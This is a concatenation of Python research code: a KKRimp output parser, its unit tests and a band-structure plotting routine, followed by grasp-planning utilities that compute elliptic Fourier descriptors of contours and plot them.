msg_list.append(msg)
try:
result = self._extract_timings(files['out_timing'])
out_dict['timings_group'] = result
out_dict['timings_unit'] = 'seconds'
except:
msg = "Error parsing output of KKRimp: timings"
msg_list.append(msg)
try:
esp_at, etot_at = self._get_energies_atom(files['out_enersp_at'], files['out_enertot_at'], natom)
out_dict['single_particle_energies'] = esp_at*Ry2eV
out_dict['single_particle_energies_unit'] = 'eV'
out_dict['total_energies_atom'] = etot_at*Ry2eV
out_dict['total_energies_atom_unit'] = 'eV'
except:
msg = "Error parsing output of KKRimp: single particle energies"
msg_list.append(msg)
try:
result_WS, result_tot, result_C = get_charges_per_atom(files['out_log'])
niter = len(out_dict['convergence_group']['rms_all_iterations'])
natyp = int(len(result_tot)//niter)
out_dict['total_charge_per_atom'] = result_WS[-natyp:]
out_dict['charge_core_states_per_atom'] = result_C[-natyp:]
# this check deals with the DOS case where output is slightly different
if len(result_WS) == len(result_C):
out_dict['charge_valence_states_per_atom'] = result_WS[-natyp:]-result_C[-natyp:]
out_dict['total_charge_per_atom_unit'] = 'electron charge'
out_dict['charge_core_states_per_atom_unit'] = 'electron charge'
out_dict['charge_valence_states_per_atom_unit'] = 'electron charge'
except:
msg = "Error parsing output of KKRimp: charges"
msg_list.append(msg)
try:
econt = self._get_econt_info(files['out_log'])
tmp_dict = {}
tmp_dict['emin'] = econt.get('emin')
tmp_dict['emin_unit'] = 'Rydberg'
tmp_dict['number_of_energy_points'] = econt.get('Nepts')
tmp_dict['epoints_contour'] = econt.get('epts')
tmp_dict['epoints_contour_unit'] = 'Rydberg'
tmp_dict['epoints_weights'] = econt.get('weights')
out_dict['energy_contour_group'] = tmp_dict
except:
msg = "Error parsing output of KKRimp: energy contour"
msg_list.append(msg)
try:
ncore, emax, lmax, descr_max = get_core_states(files['out_pot'])
tmp_dict = {}
tmp_dict['number_of_core_states_per_atom'] = ncore
tmp_dict['energy_highest_lying_core_state_per_atom'] = emax
tmp_dict['energy_highest_lying_core_state_per_atom_unit'] = 'Rydberg'
tmp_dict['descr_highest_lying_core_state_per_atom'] = descr_max
out_dict['core_states_group'] = tmp_dict
except:
msg = "Error parsing output of KKRimp: core_states"
msg_list.append(msg)
try:
niter, nitermax, converged, nmax_reached, mixinfo = self._get_scfinfo(files['out_log'])
out_dict['convergence_group']['number_of_iterations'] = niter
out_dict['convergence_group']['number_of_iterations_max'] = nitermax
out_dict['convergence_group']['calculation_converged'] = converged
out_dict['convergence_group']['nsteps_exhausted'] = nmax_reached
out_dict['convergence_group']['imix'] = mixinfo[0]
out_dict['convergence_group']['strmix'] = mixinfo[1]
out_dict['convergence_group']['qbound'] = mixinfo[2]
out_dict['convergence_group']['fcm'] = mixinfo[3]
out_dict['convergence_group']['brymix'] = mixinfo[1]
except:
msg = "Error parsing output of KKRimp: scfinfo"
msg_list.append(msg)
#convert numpy arrays to standard python lists
out_dict = convert_to_pystd(out_dict)
# return output with error messages if there are any
if len(msg_list)>0:
return False, msg_list, out_dict
else:
return True, [], out_dict
```
#### File: masci_tools/tests/test_common_functions.py
```python
from __future__ import division
from __future__ import absolute_import
from builtins import object
import pytest
from masci_tools.io.common_functions import (interpolate_dos, get_alat_from_bravais,
search_string, angles_to_vec,
vec_to_angles, get_version_info,
get_corestates_from_potential,
get_highest_core_state,
get_ef_from_potfile, open_general,
convert_to_pystd)
class Test_common_functions(object):
"""
Tests for the common functions from tools.common_functions
"""
def test_open_general(self):
path = '../tests/files/kkr/kkr_run_slab_nosoc/out_kkr'
f = open_general(path)
l1 = len(f.readlines())
f = open_general(f)
l2 = len(f.readlines())
assert l1==l2
assert l2>0
def test_interpolate_dos(self):
from numpy import load, loadtxt, shape
d0 = '../tests/files/interpol/complex.dos'
ef, dos, dos_int = interpolate_dos(d0, return_original=True)
assert ef == 0.5256
dos_ref = loadtxt('../tests/files/interpol/new3.dos')
assert (dos_int.reshape(shape(dos_ref))-dos_ref).max()<10**-4
assert (dos == load('../tests/files/interpol/ref_dos.npy')).all()
def test_interpolate_dos_filehandle(self):
from numpy import load, loadtxt, shape
d0 = open('../tests/files/interpol/complex.dos')
d0 = '../tests/files/interpol/complex.dos'
ef, dos, dos_int = interpolate_dos(d0, return_original=True)
assert ef == 0.5256
dos_ref = loadtxt('../tests/files/interpol/new3.dos')
assert (dos_int.reshape(shape(dos_ref))-dos_ref).max()<10**-4
assert (dos == load('../tests/files/interpol/ref_dos.npy')).all()
def test_get_alat_from_bravais(self):
from numpy import array, sqrt
bravais = array([[0.0, 0.5, 0.5], [0.5, 0.0, 0.5], [0.5, 0.5, 0.0]])
alat = get_alat_from_bravais(bravais)
assert abs(alat - sqrt(2)/2) < 10**-10
def test_search_string(self):
txt = open('files/kkr/kkr_run_dos_output/output.0.txt', 'r').readlines()
alatline = search_string('ALAT', txt)
noline = search_string('ALT', txt)
assert alatline == 23
assert noline == -1
def test_angles_to_vec(self):
from numpy import pi, sqrt, array, sum
vec = angles_to_vec(2., 45./180.*pi, 45./180.*pi)
assert abs(vec[0] - 1.) < 10**-10
assert abs(vec[1] - 1.) < 10**-10
assert abs(vec[2] - sqrt(2)) < 10**-10
vec = angles_to_vec(array([2., 3.]), array([45./180.*pi, pi]), array([45./180.*pi, pi/2]))
assert sum(abs(vec - array([[1., 1., sqrt(2)], [0, 0, -3]]))) < 10**-10
def test_vec_to_angles(self):
from numpy import array, sqrt, sum, pi
m, t, p = vec_to_angles(array([[0, 0, 1], [1, 1, sqrt(2)]]))
assert sum(abs(m - array([1, 2]))) < 10**-10
assert sum(abs(t - array([0, pi/4.]))) < 10**-10
assert sum(abs(p - array([0, pi/4.]))) < 10**-10
m, t, p = vec_to_angles([1, 1, sqrt(2)])
assert (m, t, p) == (2, pi/4., pi/4.)
def test_get_version_info(self):
version = get_version_info('files/kkr/kkr_run_dos_output/output.0.txt')
assert version == ('v2.2-22-g4f8f5ff', 'openmp-mac', 'kkrjm_v2.2-22-g4f8f5ff_openmp-mac_20171214102522')
def test_get_corestates_from_potential(self):
from numpy import sum, array
corestates = get_corestates_from_potential('files/kkr/kkr_run_dos_output/out_potential')
ref = ([8, 8, 8, 8],
[array([-1866.96096949, -275.8348967 , -50.32089052, -6.5316706 , -248.12312965, -41.13200278, -3.832432 , -26.5129925 ]),
array([-1866.96096949, -275.8348967 , -50.32089052, -6.5316706 , -248.12312965, -41.13200278, -3.832432 , -26.5129925 ]),
array([-1866.96096949, -275.8348967 , -50.32089052, -6.5316706 , -248.12312965, -41.13200278, -3.832432 , -26.5129925 ]),
array([-1866.96096949, -275.8348967 , -50.32089052, -6.5316706 , -248.12312965, -41.13200278, -3.832432 , -26.5129925 ])],
[array([0, 0, 0, 0, 1, 1, 1, 2]),
array([0, 0, 0, 0, 1, 1, 1, 2]),
array([0, 0, 0, 0, 1, 1, 1, 2]),
array([0, 0, 0, 0, 1, 1, 1, 2])])
assert corestates[0] == ref[0]
assert sum(abs(array(corestates[1]) - array(ref[1]))) < 10**-7
assert sum(abs(array(corestates[2]) - array(ref[2]))) < 10**-7
def test_get_highest_core_state(self):
from numpy import array
ncore = 8
ener = array([-1866.96096949, -275.8348967 , -50.32089052, -6.5316706 , -248.12312965, -41.13200278, -3.832432 , -26.5129925 ])
lval = array([0, 0, 0, 0, 1, 1, 1, 2])
out = get_highest_core_state(ncore, ener, lval)
assert out == (1, -3.832432, '4p')
def test_get_ef_from_potfile(self):
ef = get_ef_from_potfile('files/kkr/kkr_run_dos_output/out_potential')
assert ef == 1.05
def test_convert_to_pystd(self):
import numpy as np
test = {'list': [0,1,2], 'nparray': np.array([0,1,2]), 'nparray_conv_list': list(np.array([0,1,2])),
'int': 9, 'float': 0.9, 'np.int': np.int64(8), 'np.float': np.float128(9),
'dict':{'list':[0,1,2], 'nparray': np.array([0,1,2]), 'nparray_conv_list': list(np.array([0,1,2])),
'int': 9, 'float': 0.9, 'np.int': np.int64(8), 'np.float': np.float128(9),
'dict':{'list':[0,1,2], 'nparray': np.array([0,1,2]), 'nparray_conv_list': list(np.array([0,1,2])),
'int': 9, 'float': 0.9, 'np.int': np.int64(8), 'np.float': np.float128(9)}
}
}
# make a copy and convert the dict
test1 = test.copy()
test1 = convert_to_pystd(test1)
print('original ', test)
print('converted', test1)
# extract datatypes for comparison
for i in ['list', 'nparray', 'nparray_conv_list', 'int', 'float', 'np.int', 'np.float']:
ii = test[i]
if i=='list':
out0 = []
print(i, type(ii))
out0.append(type(ii))
if i in ['list', 'nparray', 'nparray_conv_list']:
for j in ii:
print(j, type(j))
out0.append(type(j))
# converted datatypes:
ii = test1[i]
if i=='list':
out = []
print(i, type(ii))
out.append(type(ii))
if i in ['list', 'nparray', 'nparray_conv_list']:
for j in ii:
print(j, type(j))
out.append(type(j))
# now compare datatypes:
assert out0 == [list, int, int, int, np.ndarray, np.int64, np.int64,
np.int64, list, int, int, int, int, float, np.int64, np.float128]
assert out == [list, int, int, int, list, int, int, int, list, int, int, int, int, float, int, float]
```
#### File: masci_tools/tests/test_kkr_plotting.py
```python
from __future__ import absolute_import
from builtins import object
import pytest
# prevent issue with not having a display on travis-ci
# this needs to go *before* pyplot imports
import matplotlib
from six.moves import range
matplotlib.use('Agg')
from matplotlib.pyplot import gcf, title
from masci_tools.io.kkr_read_shapefun_info import read_shapefun
from masci_tools.vis.kkr_plot_shapefun import plot_shapefun
from masci_tools.vis.kkr_plot_dos import dosplot
from masci_tools.vis.kkr_plot_bandstruc_qdos import dispersionplot
from masci_tools.vis.kkr_plot_FS_qdos import FSqdos2D
class Test_kkr_plotting(object):
"""
Test for KKR plotting functions
"""
@pytest.mark.mpl_image_compare(baseline_dir='files/voronoi/', filename='test.png')
def test_plot_shapefun(self):
# clear previous figure, if still there
gcf().clear()
pos, out = read_shapefun('files/voronoi/')
plot_shapefun(pos, out, 'all')
# need to return the figure in order for mpl checks to work
return gcf()
@pytest.mark.mpl_image_compare(baseline_dir='files/kkr/kkr_run_dos_output/', filename='test.png')
def test_plot_dos(self):
gcf().clear()
dosplot('files/kkr/kkr_run_dos_output/')
return gcf()
@pytest.mark.mpl_image_compare(baseline_dir='files/kkr/kkr_run_dos_output/', filename='test2.png')
def test_plot_dos2(self):
gcf().clear()
dosplot('files/kkr/kkr_run_dos_output/', units='eV_rel', nofig=True, allatoms=True, totonly=False)
return gcf()
@pytest.mark.mpl_image_compare(baseline_dir='files/kkr/kkr_run_dos_output/', filename='test3.png')
def test_plot_dos3(self):
gcf().clear()
dosplot('files/kkr/kkr_run_dos_output/', units='eV_rel', nofig=True, allatoms=True, filled=True, normalized=True, xyswitch=True, color='r')
return gcf()
@pytest.mark.mpl_image_compare(baseline_dir='files/kkr/kkr_run_dos_output/', filename='test4.png')
def test_plot_dos4(self):
gcf().clear()
dosplot('files/kkr/kkr_run_dos_output/', units='eV_rel', nofig=True, allatoms=True, lm=list(range(1,5)))
return gcf()
@pytest.mark.mpl_image_compare(baseline_dir='files/kkr/kkr_run_qdos/', filename='test.png')
def test_plot_qdos(self):
gcf().clear()
dispersionplot('files/kkr/kkr_run_qdos', reload_data=True); title('')
return gcf()
@pytest.mark.mpl_image_compare(baseline_dir='files/kkr/kkr_run_qdos/', filename='test2.png')
def test_plot_qdos2(self):
gcf().clear()
dispersionplot('files/kkr/kkr_run_qdos', reload_data=True, ratios=False, units='eV_rel', clrbar=False); title('')
return gcf()
@pytest.mark.mpl_image_compare(baseline_dir='files/kkr/kkr_run_qdos_FS/', filename='test.png')
def test_plot_qdos_FS(self):
gcf().clear()
FSqdos2D('files/kkr/kkr_run_qdos_FS/', reload_data=True)
return gcf()
```
#### File: masci_tools/vis/kkr_plot_bandstruc_qdos.py
```python
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
from matplotlib import cm
from six.moves import range
def dispersionplot(p0='./', totonly=True, s=20, ls_ef= ':', lw_ef=1, units='eV_rel', noefline=False,
color='', reload_data=False, clrbar=True, logscale=True, nosave=False, atoms=[],
ratios=False, atoms2=[], noscale=False, newfig=False, cmap=None, alpha=1.0,
qcomponent=-2, clims=[], xscale=1., raster=True, atoms3=[], alpha_reverse=False,
return_data=False, xshift=0, yshift=0, plotmode='pcolor', ptitle=None, ef=None,
as_e_dimension=None, scale_alpha_data=False):
""" plotting routine for qdos files - dispersion (E vs. q) """
# import dependencies
from numpy import loadtxt, load, save, log, abs, sum, sort, pi, shape, array
from matplotlib.pyplot import figure, plot, axvline, scatter, axhline, xlabel, ylabel, title, colorbar, pcolormesh, cm
from os import listdir, getcwd
from os.path import isdir, getctime
from time import ctime
from subprocess import check_output
from numpy import linspace
from matplotlib.colors import ListedColormap
# deal with input of file handle instead of path (see plot_kkr of aiida_kkr)
if type(p0)!=str:
pathname_with_file = p0.name
p0 = pathname_with_file.replace('/qdos.01.1.dat','') #dos.atom1
if cmap==None:
cmap = cm.viridis
if newfig: figure()
# read in data
if p0[-1]!='/': p0+='/'
# read EF if not given as input
if ef is None:
if 'potential' in listdir(p0):
ef = float(open(p0+'potential').readlines()[3].split()[1])
else:
ef = 0
alat = float(check_output('grep ALATBASIS '+p0+'inputcard', shell=True).decode('utf-8').split('=')[1].split()[0])
a0 = 2*pi/alat/0.52918
if noscale: a0 = 1.
if reload_data or 'saved_data_dispersion.npy' not in sort(listdir(p0)):
first=True
first2=True
first3=True
print('reading qdos')
j = 0
for i in sort(listdir(p0)):
if 'qdos.' in i[:5] and not isdir(p0+i):
iatom = i.replace('qdos.','').split('.')[0]
if atoms==[] or int(iatom) in atoms:
j += 1
print(j,p0,i)
tmp = loadtxt(p0+i)
tmp[:,2:5] = tmp[:,2:5]
if first:
d = tmp
first=False
else:
d[:,5:]+=tmp[:,5:]
if ratios and (atoms2==[] or int(iatom) in atoms2):
j += 1
print(j,p0,i, 'atoms2=', atoms2)
tmp = loadtxt(p0+i)
tmp[:,2:5] = tmp[:,2:5]
if first2:
d2 = tmp
first2=False
else:
d2[:,5:]+=tmp[:,5:]
if (atoms3==[] or int(iatom) in atoms3) and ratios:
j += 1
print(j,p0,i, 'atoms3=', atoms3)
tmp = loadtxt(p0+i)
tmp[:,2:5] = tmp[:,2:5]
if first3:
d3 = tmp
first3=False
else:
d3[:,5:]+=tmp[:,5:]
if not nosave: save(p0+'saved_data_dispersion', d)
else:
print('loading data')#,'qdos files created on:',ctime(getctime('qdos.01.1.dat')), '.npy file created on:', ctime(getctime('saved_data_dispersion.npy'))
d = load(p0+'saved_data_dispersion.npy')
d[:,2:5] = d[:,2:5]*a0
if ratios:
d2[:,2:5] = d2[:,2:5]*a0
d3[:,2:5] = d3[:,2:5]*a0
# set units and axis labels
if 'eV' in units:
d[:,0] = d[:,0]*13.6
d[:,5:] = d[:,5:]/13.6
ef = ef*13.6
if 'rel' in units:
d[:,0] = d[:,0]-ef
ef = 0
if ratios:
if 'eV' in units:
d2[:,5:] = d2[:,5:]/13.6
d3[:,5:] = d3[:,5:]/13.6
ylab = r'E (Ry)'
xlab = r'k'
if units=='eV':
ylab = r'E (eV)'
elif units=='eV_rel':
ylab = r'E-E_F (eV)'
elif units=='Ry_rel':
ylab = r'E-E_F (Ry)'
# plot dos
if totonly:
data = abs(sum(d[:,5:], axis=1))
else:
data = abs(d[:,5:])
if logscale: data = log(data)
x, y = xscale*sum(d[:,2:5], axis=1), d[:,0]
if qcomponent==-2:
el = len(set(d[:,0]))
if el==1 and as_e_dimension is not None:
y = d[:,2+as_e_dimension]
el = len(set(y))
ylab = r'k (1/Ang.)'
x = array([[i for i in range(len(d)//el)] for j in range(el)])
elif qcomponent!=-1:
x = xscale*d[:,2:5][:,qcomponent]
if xshift != 0:
x += xshift
if ratios:
data = abs(sum(d[:,5:], axis=1))
data2 = abs(sum(d2[:,5:], axis=1))
data = (data-data2)/(data+data2)
if yshift != 0:
y += yshift
if scale_alpha_data:
dtmp = data.copy()
dtmp = linspace(dtmp.min(), dtmp.max(), 1000)
colors = cmap(dtmp)
dtmp = dtmp - dtmp.min()
dtmp = dtmp/dtmp.max()
colors[:,-1] = alpha*(dtmp)
cmap = ListedColormap(colors)
alpha = 1.
if ratios and atoms3!=[]:
colors = cmap(data/data.max())
colors[:,-1] = abs(sum(d3[:,5:], axis=1))/abs(sum(d3[:,5:], axis=1)).max()
if alpha_reverse:
colors[:,-1] = 1 - colors[:,-1]
if ratios:
if plotmode=='scatter':
scatter(x,y,s=s, lw=0, c=colors, cmap=cmap, rasterized=raster)
else:
lx = len(set(x.reshape(-1))); ly = len(set(y.reshape(-1)))
pcolormesh(x.reshape(ly,lx), y.reshape(ly,lx), data.reshape(ly,lx), cmap=cmap, rasterized=raster, edgecolor='face', linewidths=0.0001)
#pcolormesh(x.reshape(ly,lx), y.reshape(ly,lx), data.reshape(ly,lx), cmap=cmap, rasterized=raster)
else:
if plotmode=='scatter':
scatter(x,y,c=data, s=s, lw=0, cmap=cmap, alpha=alpha, rasterized=raster)
else:
lx = len(set(x.reshape(-1))); ly = len(set(y.reshape(-1)))
pcolormesh(x.reshape(ly,lx), y.reshape(ly,lx), data.reshape(ly,lx), cmap=cmap, rasterized=raster, edgecolor='face', linewidths=0.0001)
#pcolormesh(x.reshape(ly,lx), y.reshape(ly,lx), data.reshape(ly,lx), cmap=cmap, alpha=alpha, rasterized=raster)
if clims!=[]: clim(clims[0], clims[1])
if clrbar: colorbar()
# plot fermi level
if not noefline:
if color=='':
axhline(ef, ls=ls_ef, lw=lw_ef, color='grey')
else:
axhline(ef, color=color, ls=ls_ef, lw=lw_ef)
# set axis labels
xlabel(xlab)
ylabel(ylab)
# print path to title
if totonly and ptitle is None:
title(getcwd())
else:
title(ptitle)
if return_data:
data = abs(sum(d[:,5:], axis=1))
if ratios:
data2 = abs(sum(d2[:,5:], axis=1))
data3 = abs(sum(d3[:,5:], axis=1))
return x, y, data, data2, data3
else:
return x, y, data
``` |
{
"source": "jpchiodini/Grasp-Planning",
"score": 3
} |
#### File: jpchiodini/Grasp-Planning/PlotUtils.py
```python
def finalPlot(P, finalX, finalY, image=None, contour=None, n=300):
# plot final grasping point representation.
try:
import matplotlib.pyplot as plt
except ImportError:
print("Cannot plot: matplotlib was not installed.")
return
if contour is not None:
plt.plot(contour[:, 0], contour[:, 1], 'c--', linewidth=2)
plt.plot(P[:, 0], P[:, 1], 'y', linewidth=2)
if image is not None:
plt.imshow(image, plt.cm.gray)
# plt.show()
plt.plot(P[finalX, 0], P[finalX, 1], 'r+', linewidth=2)
plt.plot(P[finalY, 0], P[finalY, 1], 'r+', linewidth=2)
# plt.show(block=True)
plt.pause(0.01)
plt.show(block=True)
def plot_efd(P, N, Cbar, image=None, contour=None, n=200):
try:
import matplotlib.pyplot as plt
except ImportError:
print("Cannot plot: matplotlib was not installed.")
return
# print(contour[:,1],contour[:,0])
# for ii in range(1, len(xt)):
# plt.plot(xt[ii], yt[ii], 'r*', linewidth=2)
# plt.show()
# plt.set_title(str(n + 1))
if contour is not None:
plt.plot(contour[:, 0], contour[:, 1], 'c--', linewidth=2)
plt.plot(P[:, 0], P[:, 1], 'r', linewidth=2)
if image is not None:
plt.imshow(image, plt.cm.gray)
# plt.show()
for ii in range(1, n):
if Cbar[ii] > 0:
plt.plot(P[ii, 0], P[ii, 1], 'y*', linewidth=2)
plt.show()
```
#### File: jpchiodini/Grasp-Planning/pyefd.py
```python
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from __future__ import absolute_import
import numpy as np
import numpy
from sympy import *
class Model(object):
def __init__(self,order = 10,normalize = False):
#initialize the model
self.px, self.py, self.zx, self.zy, self.nx, self.ny = initEFDModel(order,normalize)
def elliptic_fourier_descriptors(contour, order=10, normalize=False):
"""Calculate elliptical Fourier descriptors for a contour.
:param numpy.ndarray contour: A contour array of size ``[M x 2]``.
:param int order: The order of Fourier coefficients to calculate.
:param bool normalize: If the coefficients should be normalized;
see references for details.
:return: A ``[order x 4]`` array of Fourier coefficients.
:rtype: :py:class:`numpy.ndarray`
"""
dxy = np.diff(contour, axis=0)
dt = np.sqrt((dxy ** 2).sum(axis=1))
t = np.concatenate([([0., ]), np.cumsum(dt)])
T = t[-1]
phi = (2 * np.pi * t) / T
coeffs = np.zeros((order, 4))
for n in range(1, order + 1):
const = T / (2 * n * n * np.pi * np.pi)
phi_n = phi * n
d_cos_phi_n = np.cos(phi_n[1:]) - np.cos(phi_n[:-1])
d_sin_phi_n = np.sin(phi_n[1:]) - np.sin(phi_n[:-1])
a_n = const * np.sum((dxy[:, 0] / dt) * d_cos_phi_n)
b_n = const * np.sum((dxy[:, 0] / dt) * d_sin_phi_n)
c_n = const * np.sum((dxy[:, 1] / dt) * d_cos_phi_n)
d_n = const * np.sum((dxy[:, 1] / dt) * d_sin_phi_n)
coeffs[n - 1, :] = a_n, b_n, c_n, d_n
if normalize:
coeffs = normalize_efd(coeffs)
return coeffs
def normalize_efd(coeffs, size_invariant=True):
"""Normalizes an array of Fourier coefficients.
See [#a]_ and [#b]_ for details.
:param numpy.ndarray coeffs: A ``[n x 4]`` Fourier coefficient array.
:param bool size_invariant: If size invariance normalizing should be done as well.
Default is ``True``.
:return: The normalized ``[n x 4]`` Fourier coefficient array.
:rtype: :py:class:`numpy.ndarray`
"""
# Make the coefficients have a zero phase shift from
# the first major axis. Theta_1 is that shift angle.
theta_1 = 0.5 * np.arctan2(
2 * ((coeffs[0, 0] * coeffs[0, 1]) + (coeffs[0, 2] * coeffs[0, 3])),
((coeffs[0, 0] ** 2) - (coeffs[0, 1] ** 2) + (coeffs[0, 2] ** 2) - (coeffs[0, 3] ** 2)))
# Rotate all coefficients by theta_1.
for n in range(1, coeffs.shape[0] + 1):
coeffs[n - 1, :] = np.dot(
np.array([[coeffs[n - 1, 0], coeffs[n - 1, 1]],
[coeffs[n - 1, 2], coeffs[n - 1, 3]]]),
np.array([[np.cos(n * theta_1), -np.sin(n * theta_1)],
[np.sin(n * theta_1), np.cos(n * theta_1)]])).flatten()
# Make the coefficients rotation invariant by rotating so that
# the semi-major axis is parallel to the x-axis.
psi_1 = np.arctan2(coeffs[0, 2], coeffs[0, 0])
psi_rotation_matrix = np.array([[np.cos(psi_1), np.sin(psi_1)],
[-np.sin(psi_1), np.cos(psi_1)]])
# Rotate all coefficients by -psi_1.
for n in range(1, coeffs.shape[0] + 1):
coeffs[n - 1, :] = psi_rotation_matrix.dot(
np.array([[coeffs[n - 1, 0], coeffs[n - 1, 1]],
[coeffs[n - 1, 2], coeffs[n - 1, 3]]])).flatten()
if size_invariant:
# Obtain size-invariance by normalizing.
coeffs /= np.abs(coeffs[0, 0])
return coeffs
def calculate_dc_coefficients(contour):
"""Calculate the :math:`A_0` and :math:`C_0` coefficients of the elliptic Fourier series.
:param numpy.ndarray contour: A contour array of size ``[M x 2]``.
:return: The :math:`A_0` and :math:`C_0` coefficients.
:rtype: tuple
"""
dxy = np.diff(contour, axis=0)
dt = np.sqrt((dxy ** 2).sum(axis=1))
t = np.concatenate([([0., ]), np.cumsum(dt)])
T = t[-1]
xi = np.cumsum(dxy[:, 0]) - (dxy[:, 0] / dt) * t[1:]
A0 = (1 / T) * np.sum(((dxy[:, 0] / (2 * dt)) * np.diff(t ** 2)) + xi * dt)
delta = np.cumsum(dxy[:, 1]) - (dxy[:, 1] / dt) * t[1:]
C0 = (1 / T) * np.sum(((dxy[:, 1] / (2 * dt)) * np.diff(t ** 2)) + delta * dt)
# A0 and CO relate to the first point of the contour array as origin.
# Adding those values to the coefficients to make them relate to true origin.
return contour[0, 0] + A0, contour[0, 1] + C0
def initEFDModel(order):
a = Symbol('a')
b = Symbol('b')
c = Symbol('c')
d = Symbol('d')
m = Symbol('m')
n = Symbol('n')
a1 = Symbol('a1')
a2 = Symbol('a2')
a3 = Symbol('a3')
a4 = Symbol('a4')
b1 = Symbol('b1')
b2 = Symbol('b2')
b3 = Symbol('b3')
b4 = Symbol('b4')
c1 = Symbol('c1')
c2 = Symbol('c2')
c3 = Symbol('c3')
c4 = Symbol('c4')
d1 = Symbol('d1')
d2 = Symbol('d2')
d3 = Symbol('d3')
d4 = Symbol('d4')
a_ = [a1, a2, a3, a4]
b_ = [b1, b2, b3, b4]
c_ = [c1, c2, c3, c4]
d_ = [d1, d2, d3, d4]
x = a * cos(2 * n * pi * m) + b * sin(2 * n * pi * m)
y = c * cos(2 * n * pi * m) + d * sin(2 * n * pi * m)
dx = x.diff(m)
dy = y.diff(m)
Zx_sym = 0
Zy_sym = 0
Px = lambdify((a, b, n, m), x)
Py = lambdify((c, d, n, m), y)
Zx = lambdify((a, b, n, m), dx)
Zy = lambdify((c, d, n, m), dy)
# precomputed symbolic stuff, will be good for real time
for n_ in range(order):
dx1 = dx.subs([(a, a_[n_]), (b, b_[n_]), (n, n_ + 1)])
dy1 = dy.subs([(c, c_[n_]), (d, d_[n_]), (n, n_ + 1)])
# symbolic value of dx,dy
Zx_sym += dx1
Zy_sym += dy1
Z = sqrt(Zx_sym ** 2 + Zy_sym ** 2)
dx_norm = Zx_sym / Z
dy_norm = Zy_sym / Z
ddx_norm = dx_norm.diff(m)
ddy_norm = dy_norm.diff(m)
tt = [m]
ax = a_ + b_ + c_ + d_ + tt
Nx = lambdify(ax, ddx_norm)
Ny = lambdify(ax, ddy_norm)
return Px, Py, Zx, Zy, Nx, Ny
def generateEFDModel(coeffs, locus, numPts, px, py, zx, zy, nx, ny):
m_ = np.linspace(0, 1.0, numPts)
Px = np.ones((numPts)) * locus[0]
Py = np.ones((numPts)) * locus[1]
Zx = 0
Zy = 0
a = []
b = []
c = []
d = []
# precompute symbollic stuff, will be good for real time
for n_ in range(coeffs.shape[0]):
a.append(coeffs[n_, 0])
b.append(coeffs[n_, 1])
c.append(coeffs[n_, 2])
d.append(coeffs[n_, 3])
Px += px(a[n_], b[n_], (n_ + 1), m_)
Py += py(c[n_], d[n_], (n_ + 1), m_)
Zx += zx(a[n_], b[n_], (n_ + 1), m_)
Zy += zy(c[n_], d[n_], (n_ + 1), m_)
# put together all the variables:
N = np.zeros((numPts, 3))
for i in range(0, numPts):
ax = a + b + c + d
ax.append(m_[i])
N[i, 0] = nx(*ax)
N[i, 1] = ny(*ax)
N[i, 2] = 0
# calculate norm of normal vector
# N = np.zeros((numPts, 3))
# N[:, 0] = Nx
# N[:, 1] = Ny
# N[:, 2] = 0
P = np.zeros((numPts, 3))
P[:, 0] = Px
P[:, 1] = Py
P[:, 2] = 0
C = np.linalg.norm(N, axis=1)
# cross product tells whether we have concave or convex curvature.
crossProd = np.zeros(len(Zx))
for ii in range(0, len(Zx)):
aa = np.array([Zx[ii], Zy[ii], 0])
bb = np.array(N[ii, :])
crossProd[ii] = np.cross(aa, bb)[2]
Cbar = np.sign(crossProd) * abs(C)
return P, N, Cbar
# def generateEFDModel(coeffs, locus=(0., 0.), numPts=300):
# a = Symbol('a')
# b = Symbol('b')
# c = Symbol('c')
# d = Symbol('d')
# m = Symbol('m')
# n = Symbol('n')
#
# x = a * cos(2 * n * pi * m) + b * sin(2 * n * pi * m)
# y = c * cos(2 * n * pi * m) + d * sin(2 * n * pi * m)
#
# dx = x.diff(m)
# dy = y.diff(m)
#
# m_ = np.linspace(0, 1.0, numPts)
#
# Px = np.ones((numPts)) * locus[0]
# Py = np.ones((numPts)) * locus[1]
#
# Zx = 0
# Zy = 0
#
# Zx_sym = 0
# Zy_sym = 0
#
# fx1 = lambdify((a, b, n, m), x)
# fy1 = lambdify((c, d, n, m), y)
# fdx1_norm = lambdify((a, b, n, m), dx)
# fdy1_norm = lambdify((c, d, n, m), dy)
#
# # precompute symbollic stuff, will be good for real time
# for n_ in _range(coeffs.shape[0]):
# dx1 = dx.subs([(a, coeffs[n_, 0]), (b, coeffs[n_, 1]), (n, n_ + 1)])
# dy1 = dy.subs([(c, coeffs[n_, 2]), (d, coeffs[n_, 3]), (n, n_ + 1)])
#
# # symbolic value of dx,dy
# Zx_sym += dx1
# Zy_sym += dy1
#
# # this would be the real time portion
# for n_ in _range(coeffs.shape[0]):
# # numerical values for x,y,dx,dy
# Px += fx1(coeffs[n_, 0], coeffs[n_, 1], (n_ + 1), m_)
# Py += fy1(coeffs[n_, 2], coeffs[n_, 3], (n_ + 1), m_)
#
# Zx += fdx1_norm(coeffs[n_, 0], coeffs[n_, 1], (n_ + 1), m_)
# Zy += fdy1_norm(coeffs[n_, 2], coeffs[n_, 3], (n_ + 1), m_)
#
# Z = sqrt(Zx_sym ** 2 + Zy_sym ** 2)
# dx_norm = Zx_sym / Z
# dy_norm = Zy_sym / Z
#
# ddx = Zx_sym.diff(m)
# ddy = Zy_sym.diff(m)
# ddx_norm = dx_norm.diff(m)
# ddy_norm = dy_norm.diff(m)
#
# fdx1_norm_t = lambdify(m, dx_norm)
# fdy1_norm_t = lambdify(m, dy_norm)
# fdx1_norm = lambdify(m, ddx_norm)
# fdy1_norm = lambdify(m, ddy_norm)
# fdx1 = lambdify(m, ddx)
# fdy1 = lambdify(m, ddy)
#
# Nx_norm = fdx1_norm(m_)
# Ny_norm = fdy1_norm(m_)
# Nx = fdx1(m_)
# Ny = fdy1(m_)
# Tx = fdx1_norm_t(m_)
# Ty = fdy1_norm_t(m_)
#
# # calculate norm of normal vector
# N = np.zeros((numPts, 3))
# N[:, 0] = Nx_norm
# N[:, 1] = Ny_norm
# N[:, 2] = 0
#
# P = np.zeros((numPts, 3))
# P[:, 0] = Px
# P[:, 1] = Py
# P[:, 2] = 0
#
# C = np.linalg.norm(N, axis=1)
#
# # cross product tells whether we have concave or convex curvature.
# crossProd = np.zeros(len(Zx))
# for ii in range(0, len(Zx)):
# aa = np.array([Zx[ii], Zy[ii], 0])
# bb = np.array([Nx_norm[ii], Ny_norm[ii], 0])
# crossProd[ii] = np.cross(aa, bb)[2]
#
# Cbar = np.sign(crossProd) * abs(C)
# return P, N, Cbar
